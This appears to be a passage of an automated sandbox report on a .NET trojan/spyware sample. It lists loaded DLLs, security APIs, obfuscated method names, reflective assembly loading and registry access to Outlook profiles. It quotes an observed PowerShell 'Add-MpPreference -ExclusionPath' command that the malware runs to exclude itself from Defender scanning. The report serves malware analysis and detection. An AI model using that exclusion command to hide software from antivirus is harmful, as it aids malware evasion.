                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/9@4/4
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1Jump to behavior
                  Source: VbcXXnmIwPPhh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: VbcXXnmIwPPhh.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: VbcXXnmIwPPhh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: VbcXXnmIwPPhh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: VbcXXnmIwPPhh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
                  Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe

                  Data Obfuscation

                  barindex
                  Source: VbcXXnmIwPPhh.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs.Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs.Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: VbcXXnmIwPPhh.exeStatic PE information: 0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 0_2_0308EF83 push eax; iretd 0_2_0308EF89
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF9241 push es; ret 6_2_06DF9244
                  Source: VbcXXnmIwPPhh.exeStatic PE information: section name: .text entropy: 7.877925712281058
                  Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, v7TfX0cN66hhgJUJwJ.csHigh entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, Ny32pHRu6f6w0bk14d.csHigh entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, SjH6iEglMe4JJag9x8.csHigh entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, fLnSLcQsburVYyKgWh.csHigh entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, rlPD0bXvfvPTrMIcH5.csHigh entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, LL8myueE5FL4FwPBUS.csHigh entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.csHigh entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, nH6PHboIq1eMy9lsOx.csHigh entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, kUuY6siW5vyxdHktXRf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, KdrMBNtPmnWruc2Qo7.csHigh entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, eRvY0DhwwMDag3tMd8.csHigh entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, L6vjyKid9aDaoe5HiaO.csHigh entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, p94yMyHuCERHsEo3os.csHigh entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.csHigh entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qHKnAkDX8ytgCp1mSc.csHigh entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, sjbL9g05wUgikYyDq1.csHigh entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, XOPcij2EZTlP5u1gAE.csHigh entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
                  Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qiNcDkbGW6sJO9UAgD.csHigh entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, v7TfX0cN66hhgJUJwJ.csHigh entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, Ny32pHRu6f6w0bk14d.csHigh entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, SjH6iEglMe4JJag9x8.csHigh entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
